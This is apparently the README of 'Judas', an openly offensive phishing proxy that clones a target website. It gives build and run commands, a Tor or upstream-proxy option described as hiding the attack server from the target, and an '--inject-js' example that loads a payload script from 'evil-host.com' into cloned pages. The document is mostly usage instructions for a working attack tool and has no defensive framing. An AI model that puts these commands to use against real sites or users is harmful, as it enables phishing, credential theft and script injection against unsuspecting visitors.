Judas is a phishing proxy. It can clone a website passed to it using command line flags.

To build Judas, simply go build -o judas proxy.go

The target --target flag is required. By default, Judas requires a path to a SSL certificate (--cert) and a SSL private key (--private-key). If you want to listen using HTTP, pass the --insecure flag.

Example:

./judas --target https://target-url.com --cert server.crt --private-key server.key

./judas --target https://target-url.com --insecure

It can optionally use an upstream proxy with the --proxy argument to proxy Tor websites or hide the attack server from the target.

Example:

./judas --target https://torwebsite.onion --cert server.crt --private-key server.key --proxy localhost:9150

By default, Judas listens on localhost:8080. To change this, use the --address argument.

Example:

./judas --target https://target-url.com --cert server.crt --private-key server.key --address=0.0.0.0:8080

Judas can also inject custom JavaScript into requests by passing a URL to a JS file with the --inject-js argument.

Example:

./judas --target https://target-url.com --cert server.crt --private-key server.key --inject-js https://evil-host.com/payload.js